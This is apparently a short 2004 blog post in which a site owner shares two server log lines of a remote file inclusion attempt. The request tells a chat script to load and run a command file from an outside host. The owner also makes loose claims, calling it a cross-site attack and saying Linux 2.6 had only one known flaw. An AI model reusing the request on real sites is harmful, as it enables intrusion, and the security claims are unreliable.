I got this log
200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"
so I imediatlly recogniez that it was a cross site attack I saw that they got 404, then I connected to
http://mail.omd.it/cmd1.txt and the exploit was there, and then I connected to http://omd.it guess what I got? Yes my own site,
then I instantly though that the site had been “hacked” and they were using it to hack my site,I instantlly blocked their server but then I thought I will disblock to show the people the attack .
They use the chattblock to upload the exploit then they run it. Well I have a 2.6.4 kernel I don't think thay would be able to exploit that kernel as the only vulnerability found on the linux 2.6 kernel is a iptable DOS attack and I had my chatterblock disabled
I love this I get very excited I have more people attacking my site than visiting it











